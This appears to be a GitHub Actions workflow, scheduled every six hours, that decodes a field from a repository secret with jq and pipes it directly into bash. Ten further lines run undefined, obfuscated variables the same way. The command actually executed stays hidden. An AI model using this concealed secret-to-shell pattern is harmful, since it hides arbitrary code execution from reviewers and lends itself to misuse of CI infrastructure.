name: qingtongqingong
on:
  workflow_dispatch:
  schedule:
    - cron: '32 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qingtongqingong
        env:
          yohy81173: ${{ secrets.yohy81173 }}
        run: |
          echo $yohy81173 | jq -r .x5414 | /bin/bash
          echo $yk685 | jq -r .yukl99 | /bin/bash
          echo $bzpad44 | jq -r .crfld7 | /bin/bash
          echo $pg93829 | jq -r .f376 | /bin/bash
          echo $f99 | jq -r .e960 | /bin/bash
          echo $j51 | jq -r .qrxvm16 | /bin/bash
          echo $muxu85903 | jq -r .psfy129 | /bin/bash
          echo $bbnph8 | jq -r .wmv616 | /bin/bash
          echo $lz34263 | jq -r .oicw28013 | /bin/bash
          echo $typo0 | jq -r .n85612 | /bin/bash
          echo $j920 | jq -r .w25355 | /bin/bash

